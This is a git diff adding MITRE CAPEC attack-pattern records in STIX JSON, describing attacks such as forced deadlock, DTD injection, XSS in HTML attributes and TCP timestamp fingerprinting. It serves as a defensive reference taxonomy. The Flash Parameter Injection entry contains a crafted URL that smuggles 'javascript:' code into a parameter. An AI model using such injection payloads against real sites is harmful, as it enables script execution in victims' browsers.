a/capec/attack-pattern/attack-pattern--f61a3128-069b-4def-a009-36d2ae15419f.json b/capec/attack-pattern/attack-pattern--f61a3128-069b-4def-a009-36d2ae15419f.json new file mode 100644 index 0000000000..f75f4255ad --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f61a3128-069b-4def-a009-36d2ae15419f.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--8305cba1-eec5-4c23-9f64-3b466f0f8607", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f61a3128-069b-4def-a009-36d2ae15419f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-02-14T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Route Disabling", + "description": "An adversary disables the network route between two targets. The goal is to completely sever the communications channel between two entities. This is often the result of a major error or the use of an \"Internet kill switch\" by those in control of critical infrastructure. This attack pattern differs from most other obstruction patterns by targeting the route itself, as opposed to the data passed over the route.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/582.html", + "external_id": "CAPEC-582" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route denies the availability of a service.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary requires knowledge of and access to network route." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f6c3e4d5-4ba7-44ed-9558-ef7d5daf433d.json b/capec/attack-pattern/attack-pattern--f6c3e4d5-4ba7-44ed-9558-ef7d5daf433d.json new file mode 100644 index 0000000000..ad5dc96577 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f6c3e4d5-4ba7-44ed-9558-ef7d5daf433d.json @@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--247e85f6-0423-4b9c-a0f9-c043b0475ad9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f6c3e4d5-4ba7-44ed-9558-ef7d5daf433d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Forced Deadlock", + "description": "The adversary triggers and exploits a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock conditions can be difficult to detect.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/25.html", + "external_id": "CAPEC-25" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/412.html", + "external_id": "CWE-412" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/567.html", + "external_id": "CWE-567" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/662.html", + "external_id": "CWE-662" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/833.html", + "external_id": "CWE-833" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/667.html", + "external_id": "CWE-667" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Deadlock", + "external_id": "REF-101" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (A successful forced deadlock attack compromises the availability of the system by exhausting its available resources.)" + ] + }, + "x_capec_example_instances": [ + "An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock)" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions. [R.25.3][REF-6]", + "The target host exposes an API to the user." + ], + "x_capec_skills_required": { + "Medium": "This type of attack may be sophisticated and require knowledge about the system's resources and APIs." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f7a4894c-1535-4ab0-8b9f-2f146b3c97f3.json b/capec/attack-pattern/attack-pattern--f7a4894c-1535-4ab0-8b9f-2f146b3c97f3.json new file mode 100644 index 0000000000..754310adac --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f7a4894c-1535-4ab0-8b9f-2f146b3c97f3.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--ef62b23a-aed3-467e-bfee-1d728ef51ee2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f7a4894c-1535-4ab0-8b9f-2f146b3c97f3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Hijacking a privileged process", + "description": "An attacker gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code. Processes can be hijacked through improper handling of user input (for example, a buffer overflow or certain types of injection attacks) or by utilizing system utilities that support process control that have been inadequately secured.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/234.html", + "external_id": "CAPEC-234" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html", + "external_id": "CWE-648" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f7c69d80-10e8-4ddd-a4ad-da248797ba15.json b/capec/attack-pattern/attack-pattern--f7c69d80-10e8-4ddd-a4ad-da248797ba15.json new file mode 100644 index 0000000000..1264174089 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f7c69d80-10e8-4ddd-a4ad-da248797ba15.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--24b67222-1b7c-4231-91e7-9a2e10136582", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f7c69d80-10e8-4ddd-a4ad-da248797ba15", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Force the System to Reset Values", + "description": "An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions. Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/166.html", + "external_id": "CAPEC-166" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html", + "external_id": "CWE-306" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted application must have a reset function that returns the configuration of the application to an earlier state.", + "The reset functionality must be inadequately protected against use." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker may need special client applications in order to execute the reset functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f7ebb8a9-bfde-4217-979b-2a4fa9ed43ed.json b/capec/attack-pattern/attack-pattern--f7ebb8a9-bfde-4217-979b-2a4fa9ed43ed.json new file mode 100644 index 0000000000..8504ba78ae --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f7ebb8a9-bfde-4217-979b-2a4fa9ed43ed.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--63cf973d-e875-4573-ab1f-f12cc6bce91a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f7ebb8a9-bfde-4217-979b-2a4fa9ed43ed", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Unauthorized Use of Device Resources", + "description": "An adversary that has previously obtained unauthorized access to certain device resources, uses that access to obtain information such as location and network information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/629.html", + "external_id": "CAPEC-629" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_skills_required": { + "High": "Knowledge of the affected system, including what devices are connected to it, as well as knowledge of how to extract information from these devices." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85.json b/capec/attack-pattern/attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85.json new file mode 100644 index 0000000000..64895a0621 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--1dcaa16b-fc97-4669-9293-39fd63aadd46", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DTD Injection", + "description": "An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/228.html", + "external_id": "CAPEC-228" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html", + "external_id": "CWE-829" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Ryan Naraine, DoS Flaw in SOAP DTD Parameter, InternetNews.com, 2003--12---15, ITBusiness Edge, Quinstreet Inc.", + "url": "http://www.internetnews.com/dev-news/article.php/3289191", + "external_id": "REF-86" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The target must be running an XML based application that leverages DTDs." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3.json b/capec/attack-pattern/attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3.json new file mode 100644 index 0000000000..b266e9d34a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--beacda07-7e9a-415e-869c-f00a07461f52", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XSS Targeting HTML Attributes", + "description": "An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/243.html", + "external_id": "CAPEC-243" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html", + "external_id": "CWE-83" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Jeremiah Grossman, Attribute-Based Cross-Site Scripting", + "url": "http://jeremiahgrossman.blogspot.com/2007/07/attribute-based-cross-site-scripting.html", + "external_id": "REF-94" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands." + ], + "x_capec_resources_required": [ + "The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fa6a0a3c-2056-42e4-8e16-cad392c96890.json b/capec/attack-pattern/attack-pattern--fa6a0a3c-2056-42e4-8e16-cad392c96890.json new file mode 100644 index 0000000000..08b31c9916 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fa6a0a3c-2056-42e4-8e16-cad392c96890.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--9ca7eeaa-ba2f-4277-981c-7962fbf80bd7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fa6a0a3c-2056-42e4-8e16-cad392c96890", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Transparent Proxy Abuse", + "description": "A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client. Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/465.html", + "external_id": "CAPEC-465" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html", + "external_id": "CWE-441" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Robert Auger, Socket Capable Browser Plugins Result In Transparent Proxy Abuse, 2009", + "url": "http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf", + "external_id": "REF-402" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim's browser" + ], + "x_capec_skills_required": { + "Medium": "Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fabe9a56-1333-417c-af2c-dc3ce7465a0c.json b/capec/attack-pattern/attack-pattern--fabe9a56-1333-417c-af2c-dc3ce7465a0c.json new file mode 100644 index 0000000000..d6e8b3eff5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fabe9a56-1333-417c-af2c-dc3ce7465a0c.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--95ce3ba5-d780-4ffa-82b3-60c0e37f2ff6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fabe9a56-1333-417c-af2c-dc3ce7465a0c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Flash Parameter Injection", + "description": "An adversary takes advantage of improper data validation to inject malicious global parameters into a Flash file embedded within an HTML document. Flash files can leverage user-submitted data to configure the Flash document and access the embedding HTML document. These 'FlashVars' are most often passed to the Flash file via URL arguments or from the Object or Embed tag within the embedding HTML document. If these FlashVars are not properly sanitized, an adversary may be able to embed malicious content (such as scripts) into the HTML document. The injected parameters can also provide the adversary control over other objects within the Flash file as well as full control over the parent document's DOM model. As such, this is a form of HTTP parameter injection, but the abilities granted to the Flash document (such as access to a page's document model, including associated cookies) make this attack more flexible. Flash Parameter Injection attacks can also preface further attacks such as various forms of Cross-Site Scripting (XSS) attacks in addition to Session Hijacking attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/174.html", + "external_id": "CAPEC-174" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html", + "external_id": "CWE-88" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Yuval B., Ayal Y., Adi S., Flash Parameter Injection: A Security Advisory, 2008--09---24, IBM Rational Security Team", + "url": "http://blog.watchfire.com/FPI.pdf", + "external_id": "REF-40" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Elaborate Ways to Exploit XSS: Flash Parameter Injection (FPI), 2014--04---08, Acunetix", + "url": "https://www.acunetix.com/blog/articles/elaborate-ways-exploit-xss-flash-parameter-injection/", + "external_id": "REF-560" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_example_instances": [ + "\n The following are examples for different types of parameters passed to the Flash file.\n \n DOM-based Flash parameter injection\n \n \n \n \n Passing parameter in an embedded URI\n \n Passing parameter in flashvars\n \n Persistent Flash Parameter Injection\n \n // Create a new shared object or read an existing one\n mySharedObject = SharedObject.getLocal(\"flashToLoad\");if (_root.flashfile == undefined) {\n \n // Check whether there is a shared object saved\n if (mySharedObject.data.flash == null) {\n \n // Set a default\n value _root.flashfile = \"defaultFlash.swf\";\n } else {\n \n // Read the flash file to load from the shared object\n _root.flashfile = mySharedObject.data.flash;\n }\n }\n // Store the flash file's name in the shared object\n \n mySharedObject.data.flash = _root.flashfile;\n // Load the flash file\n \n getURL(_root.flashfile);\n If an unsuspecting user is lured by an attacker to click on link like this: http://example.com/vulnerable.swf?flashfile=javascript:alert(document.domain)\n The result will be not merely a one-time execution of the JavaScript code in the victim's browser in the context of the domain with the vulnerable Flash file, but every time the Flash is loaded, whether by direct reference or embedded inside the same domain, the JavaScript will be executed again.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_resources_required": [ + "The attacker must convince the victim to click their crafted link." + ], + "x_capec_skills_required": { + "Medium": "The attacker need inject values into the global parameters to the Flash file and understand the parent HTML document DOM structure. The attacker need be smart enough to convince the victim to his crafted link." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de.json b/capec/attack-pattern/attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de.json new file mode 100644 index 0000000000..b3458017e2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de.json @@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--6c185868-14aa-4367-a3eb-acb8352010f5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "Sniff Application Code", + "description": "An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/65.html", + "external_id": "CAPEC-65" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html", + "external_id": "CWE-319" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html", + "external_id": "CWE-318" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/719.html", + "external_id": "CWE-719" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..", + "Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have the ability to place himself in the communication path between the client and server.", + "The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.", + "The attacker must be able to employ a sniffer on the network without being detected." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to capture communications between the client being updated and the server providing the update.\n In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client.\n " + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ a man-in-the-middle attack, the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c.json b/capec/attack-pattern/attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c.json new file mode 100644 index 0000000000..0546287347 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--32fbd2fa-13ac-472c-a929-db856c94c2d9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cryptanalysis of Cellular Encryption", + "description": "The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/608.html", + "external_id": "CAPEC-608" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html", + "external_id": "CWE-327" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other (Reveals IMSI and IMEI for tracking of retransmission device and enables further follow-on attacks by revealing black network control messages. (e.g., revealing IP addresses of enterprise servers for VOIP connectivity))" + ] + }, + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can rent commercial supercomputer time globally to conduct cryptanalysis on encrypted data captured from mobile devices. Foreign governments have their own cryptanalysis technology and capabilities. Commercial cellular standards for encryption (GSM and CDMA) are also subject to adversary cryptanalysis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--fbad6466-feb9-4ef1-955f-0ebc1dffb88e.json b/capec/attack-pattern/attack-pattern--fbad6466-feb9-4ef1-955f-0ebc1dffb88e.json new file mode 100644 index 0000000000..ddd75f328a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--fbad6466-feb9-4ef1-955f-0ebc1dffb88e.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--ca940cb6-8868-497b-9b4d-111895d49d43", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--fbad6466-feb9-4ef1-955f-0ebc1dffb88e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Timestamp Probe", + "description": "This OS fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/320.html", + "external_id": "CAPEC-320" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.The target OS must support the TCP timestamp option in order to obtain a fingerprint." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git 